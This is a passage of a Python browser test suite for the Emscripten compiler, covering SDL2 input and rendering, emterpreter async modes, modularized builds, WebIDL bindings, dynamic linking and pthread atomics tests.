var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o']).communicate()
Popen([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html']).communicate()
self.run_browser('test.html', '...', '/report_result?1')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'NO_EXIT_RUNTIME=0'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause a timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously (before HelloWorld() returns), so |hello| may not be set yet!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'BINARYEN_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression in the modularize feature introduced in commit c5af8f6,
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# an amount of memory, different from the default, that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
Popen([PYTHON, EMCC, 'test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1'])
@requires_graphics_hardware
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
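# preload a 30MB file with TOTAL_MEMORY=16MB so the heap must grow while the runtime is still starting up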
open('data.dat', 'w').write('X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
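# write a shell HTML that hides SharedArrayBuffer and Atomics, so tests can exercise the non-SAB fallback path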
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=90)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11', '-s', 'USE_PTHREADS=1'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt + debug + f32 + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=60)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Tests the remaining GCC atomics not covered by the two tests above.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'] + arg, timeout=30)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print(str(opt) + ' ' + str(pthreads))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Tests the -s PROXY_TO_PTHREAD=1 option.
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
